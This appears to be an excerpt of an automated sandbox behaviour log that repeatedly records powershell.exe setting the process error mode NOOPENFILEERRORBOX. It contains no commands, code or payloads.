                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
